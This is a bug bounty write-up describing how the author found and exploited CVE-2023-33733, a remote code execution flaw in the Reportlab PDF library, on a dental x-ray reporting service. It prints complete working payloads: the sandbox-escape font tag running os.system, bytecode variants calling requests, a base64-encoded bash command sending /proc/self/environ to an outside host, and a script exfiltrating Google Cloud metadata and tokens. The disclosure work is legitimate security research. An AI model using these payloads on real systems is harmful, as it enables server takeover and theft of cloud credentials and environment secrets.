Exploiting CVE-2023-33733 RCE via HTMLi in Reportlab in a Bug Bounty Program

This is probably the best bug I have ever found on a bug bounty target, consider it impact wise or the coolness of this exploit.

In this writeup I will go through the steps I took to identify what the target was using to generate pdfs then how I was able to confirm the rce.

You can find more details of the exploit I used here: https://security.snyk.io/vuln/SNYK-PYTHON-REPORTLAB-5664897

CVE-2023-33733 was found by a pentester from Cure53 Elyas Damej , so props to him for finding this and also sharing the poc with so much details https://github.com/c53elyas/CVE-2023-33733

The target announced a new scope was added to their program so without wasting any time I jumped back right to it to see if I can find something there.

I first started with going through the application seeing what the functionalities are there. The application had very limited things to test , basically the application was designed for Dentist where they could upload their patients xray reports (png,jpg,etc were allowed).

After uploading the xray image you can edit some fields such as Patient Name,Date of Report,Comments,etc. Once you have added all the required details you can print the xray report which has the xray image ,patient name,date of report ,etc in it.

I am always fascinated with such pdf render endpoints , have exploited some in the past too https://x.com/sudhanshur705/status/1618608391391449090?s=20

And recently this where with rootxharsh and iamnooob managed to pwn a target : https://twitter.com/sudhanshur705/status/1694404470317420708

I found them fascinating because as they most often deal with html which is later converted to pdf via using some library (PrinceXML,reportlab,dompdf,etc) otherwise headlesschrome to take a screenshot then converting it to pdf ,if you manage to get html/js injection in the html template which is passed to pdf generator process then things get really interesting.

Interesting things ranges from SSRF as with iframe you can try loading internal resources/metadata inside it or even file uri to leak local files. With Javascript you can even use fetch call to to try reading responses from some internal resources often times in such cases it doesn’t have a concept of Same origin policy or it’s disabled for specific reasons.Even there some ways to bypass SOP by having 2 A records one which resolves to the internal IP which you want to reach another one which resolves to public ip of your vps.

You could find details about it here in this ctf challenge by @strellic : https://brycec.me/posts/corctf_2023_challenges#pdf-pal

Quoting it from the writeup above:

But the general idea is that we use multiple A records, one with the IP for our server, then one for 0.0.0.0. When the admin bot goes to our domain, it resolves the IP for our server and loads a custom payload page. Then, we kill our server. Then, when it attempts to load a new resource on the same-origin, it can’t access it at our IP (since our server is dead), and so falls back to 0.0.0.0, reading a localhost resource. Since this is same-origin, we can read the response.

Back to the reportlab cve finding on my target.

This was the request made when I clicked on the Generate Report button: BurpSuiteCommunity_YGtRpwVCRF

The generated report was then visible in the application.

I downloaded the pdf and used exiftool to check if I can identify what software they were using in the pdf generation process, but there were no information.

I then added some html code in the comment parameter

"><img src=https://myhost>

I used such payloads to fingerprint the library/browser they might be using to render the html code server side.

I made the changes and when I press the Generate report button the request failed, I checked the response and this error was there:

ApplicationFrameHost_smBlNZe91s

{
"\nparagraph text '<para>Note: <font color=\"#484848\"><img src=x></font></para>' caused exception Parse error: saw </font> instead of expected </img>"
}

The moment I saw that error I was like woooow !!! I was pretty confident after that I am going to find something critical there.

My input was this exactly <img src=x> From the error it seems the server does no sanitization on the user input and directly uses it in the html file.

<para>Note: <font color="#484848"></font></para>

Consider `` as a placeholder for the user controllable input, as there is no sanitization I am also able to include arbitrary html which is then passed to pdf generator library to convert it to pdf.

From the error it’s indicating that the library’s html parser has failed to parse the provided html due to our input <img src=x> as it doesn’t have a matching closing tag.

And upon using this payload a different error message was shown,I also added my host in the src attribute so that when the image tag renders a request will be sent to my server from there the logs should tell me about the User-Agent from that I can know which library is it. I added onerror attribute also just to see what would happen:

<img src=https://myhost onerror=alert()>

This time another error was triggered:

ApplicationFrameHost_Wun1vBOWO2

["\nparagraph text '<para>Note: <font color=\"#484848\">test\"><img src=https://myhost onerror=alert()></font></para>' caused exception paraparser: syntax error: invalid attribute name onerror attrMap=['height', 'src', 'valign', 'width']"]

The error message is already very descriptive on where the problem is, the onerror attribute is not in the attrMap list (consider it a list of whitelisted attribute names) that’s why the error was triggered.

Then I removed the onerror attribute and tested it to identify the pdf generator library:

User-Agent: Python-urllib/3.10

Woah cool so the backend is python, when it comes to python one of the most popular libraries for generating pdf is reportlab (https://www.reportlab.com/)

I am no alien to reportlab I have tried looking into it’s source in the past trying to find some 0day in it but failed miserably as I suck at source code review (still learning) but I still got some basic idea about reportlab. I already had a repo where I pushed reportlab source code , so I copied a part of the error mssg and searched there

Ah nice found a match for invalid attribute name https://github.com/search?q=repo%3ASudistark%2Freportlab-diff+%22invalid+attribute+name%22&type=code

https://github.com/Sudistark/reportlab-diff/blob/f6ea20518ca3caafee27ba5301bc9e079972dd98/reportlab/src/reportlab/platypus/paraparser.py#L3080

    def getAttributes(self,attr,attrMap):
        A = {}
        for k, v in attr.items():
            if not self.caseSensitive:
                k = k.lower()
            if k in attrMap:
                j = attrMap[k]
                func = j[1]
                if func is not None:
                    #it's a function
                    v = func(self,v) if isinstance(func,_ExValidate) else func(v)
                A[j[0]] = v
            else:
                self._syntax_error('invalid attribute name %s attrMap=%r'% (k,list(sorted(attrMap.keys()))))

Ok so this exactly matched with the error message that was shown in the webiste.

I was already aware of the RCE cve which came out recently in reportlab.

Elyas shared full details how the payload works so if you are interested checkout his repo: https://github.com/c53elyas/CVE-2023-33733

<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('touch /tmp/exploited') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
                exploit
</font></para>

He explained the sandbox bypass line by line you could try executing in the python console itself along to understand it better.

I tried understanding this payload after reading his writeup it still looked so difficult for me to understand , I then also tried to execute it in python console line by line which later helped a lot.

After I confirmed that reportlab is in use.I used the following payload to confirm if it indeed using the vulnerable version or not.

curl https://myhost.com

<para>
              <font color="[ [ getattr(pow,Word('__globals__'))['os'].system('curl https://myhost.com') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">
                exploit
                </font>
            </para>

Nope it didn’t worked, the pdf was succesffuly generated but no pingbacks were sent to my server. I changed curl command to ping,wget in hope of getting a dns interaction atleast but nope.

At this moment I questioned are they really using the vulnerable version?

I needed to find the answer for this, which could only be done by using a local setup.

Using the same sample vulnerable code which Elyas shared in his repo I could confirm the exploit locally: https://github.com/c53elyas/CVE-2023-33733/blob/master/code-injection-poc/poc.py

from reportlab.platypus import SimpleDocTemplate, Paragraph
from io import BytesIO
stream_file = BytesIO()
content = []

def add_paragraph(text, content):
    """ Add paragraph to document content"""
    content.append(Paragraph(text))

def get_document_template(stream_file: BytesIO):
    """ Get SimpleDocTemplate """
    return SimpleDocTemplate(stream_file)

def build_document(document, content, **props):
    """ Build pdf document based on elements added in `content`"""
    document.build(content, **props)



doc = get_document_template(stream_file)
#
# THE INJECTED PYTHON CODE THAT IS PASSED TO THE COLOR EVALUATOR
#[
#    [
#        getattr(pow, Word('__globals__'))['os'].system('touch /tmp/exploited')
#        for Word in [
#            orgTypeFun(
#                'Word',
#                (str,),
#                {
#                    'mutated': 1,
#                    'startswith': lambda self, x: False,
#                    '__eq__': lambda self, x: self.mutate()
#                    and self.mutated < 0
#                    and str(self) == x,
#                    'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)},
#                    '__hash__': lambda self: hash(str(self)),
#                },
#            )
#        ]
#    ]
#    for orgTypeFun in [type(type(1))]
#]

add_paragraph("""
            <para>
              <font color="[ [ getattr(pow,Word('__globals__'))['os'].system('touch /tmp/exploited') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">
                exploit
                </font>
            </para>""", content)
build_document(doc, content)

You could see the exploit works in reportlab v3.6.12

Let’s see now what happens in the fixed version:

Saw the error? The exploit failed

  File "/home/runner/VelvetyFuchsiaCompiler/venv/lib/python3.10/site-packages/reportlab/lib/colors.py", line 931, in __call__
    raise ValueError('Invalid color value %r' % arg)
ValueError: 
paragraph text '<para> <font color="[ [ getattr(pow,Word(\'__globals__\'))[\'os\'].system(\'touch /tmp/exploited\') for Word in [orgTypeFun(\'Word\', (str,), { \'mutated\': 1, \'startswith\': lambda self, x: False, \'__eq__\': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, \'mutate\': lambda self: {setattr(self, \'mutated\', self.mutated - 1)}, \'__hash__\': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and \'red\'"> exploit </font> </para>' caused exception Invalid color value "[ [ getattr(pow,Word('__globals__'))['os'].system('touch /tmp/exploited') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'"

In case of old version no error is triggered and in fixed version upon using the same payload an error is triggered.

When I used the same poc in my target no error was shown pdf was generated successfully, which indicated that they are indeed using vulnerable version otherwise an error should have shown.

Recently upon collaborating with @rootxharsh, he had a similar scenario where curl,wget,ping didn’t worked so it was concluded that the headless chrome process might be running with sandbox enabled but infact later when @iamnoooob checked the same, he used a reverse shell and a callback was recieved successfully in no time. So when Harsh checked the shell to confirm why those curl,wget,ping didn’t worked he found that curl,wget,ping didn’t existed on that box . Shit happens!!

As in my case also curl,etc didn’t worked, I thought why not try using python requests module instead.

<font color="[ [ [ [ ftype(ctype(0, 0, 0, 0, 3, 67, b't\\x00d\\x01\\x83\\x01\\xa0\\x01d\\x02\\xa1\\x01\\x01\\x00d\\x00S\\x00', (None, 'requests', 'https://myhost'), ('__import__','get'), (), '<stdin>', '', 1, b'\\x12\\x01'), {})() for ftype in [type(lambda: None)] ] for ctype in [type(getattr(lambda: {None}, Word('__code__')))] ] for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))]] and 'red'">exploit</font>

I replaced only this part: https://security.snyk.io/vuln/SNYK-PYTHON-REPORTLAB-5664897

- (None, 'os', 'touch /tmp/exploited'), ('__import__', 'system')
+ (None, 'requests', 'https://myhost'), ('__import__','get')

Pretty cool upon using this payload, I recieved a pingback on my server:

User-Agent: python-requests/2.31.0

This confirmed that I could execute arbitrary code on the system. I needed some more info before I write the report.

I modified the poc and relied upon this to send the command output to my server

python3 -c "import requests;requests.get('https://en2celq7rewbul.m.pipedream.net/$(id)')"

python3 -c "import requests;requests.get('https://en2celq7rewbul.m.pipedream.net/$(cat /proc/self/environ)')"

(None, 'os', 'echo cHl0aG9uMyAtYyAiaW1wb3J0IHJlcXVlc3RzO3JlcXVlc3RzLmdldCgnaHR0cHM6Ly9lbjJjZWxyN3Jld2J1bC5tLnBpcGVkcmVhbS5uZXQvJChjYXQgL3Byb2Mvc2VsZi9lbnZpcm9uKScpIg== | base64 -d|bash'), ('__import__', 'system')

<font color="[ [ [ [ ftype(ctype(0, 0, 0, 0, 3, 67, b't\\x00d\\x01\\x83\\x01\\xa0\\x01d\\x02\\xa1\\x01\\x01\\x00d\\x00S\\x00', (None, 'os', 'echo cHl0aG9uMyAtYyAiaW1wb3J0IHJlcXVlc3RzO3JlcXVlc3RzLmdldCgnaHR0cHM6Ly9lbjJjZWxyN3Jld2J1bC5tLnBpcGVkcmVhbS5uZXQvJChjYXQgL3Byb2Mvc2VsZi9lbnZpcm9uKScpIg== | base64 -d|bash'), ('__import__', 'system'), (), '<stdin>', '', 1, b'\\x12\\x01'), {})() for ftype in [type(lambda: None)] ] for ctype in [type(getattr(lambda: {None}, Word('__code__')))] ] for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))]] and 'red'">exploit</font>

The content of /proc/self/environ were really really sensitive , I submitted the report at this moment. As this server responsible for generating pdfs was hosted on Google Cloud , I could even fetch Metadata response also.

To confirm this I used the below payload:

python3 -c "import requests;import base64;metadata_url = 'http://169.254.169.254/computeMetadata/v1/instance/?recursive=true';metadata_headers = {'Metadata-Flavor': 'Google'};response = requests.get(metadata_url, headers=metadata_headers);encoded_metadata = base64.b64encode(response.text.encode()).decode();target_server_url = 'https://en2celq7rewbul.m.pipedream.net/';data_payload = {'metadata': encoded_metadata};requests.post(target_server_url, json=data_payload)"

Beautified one line code for you :)

import requests
import base64

metadata_url = 'http://169.254.169.254/computeMetadata/v1/instance/?recursive=true'

metadata_headers = {'Metadata-Flavor': 'Google'} # custom metadata header requirement we have RCE so we could add it easily ;)

response = requests.get(metadata_url, headers=metadata_headers)

encoded_metadata = base64.b64encode(response.text.encode()).decode()

target_server_url = 'https://en2celq7rewbul.m.pipedream.net/'

data_payload = {'metadata': encoded_metadata}

requests.post(target_server_url, json=data_payload)

The above code basically makes a request to the Google cloud Metadata Endpoint then sends the json response to my server (which is base64 encoded), at last I also confirmed if I could fetch access_token for the used serviceAccount.

After confirming all this I ceased my testing and reported everything to the program.

The program was really happy with the report, although their maximum payout was 3k they still paid this 4.5k for this bug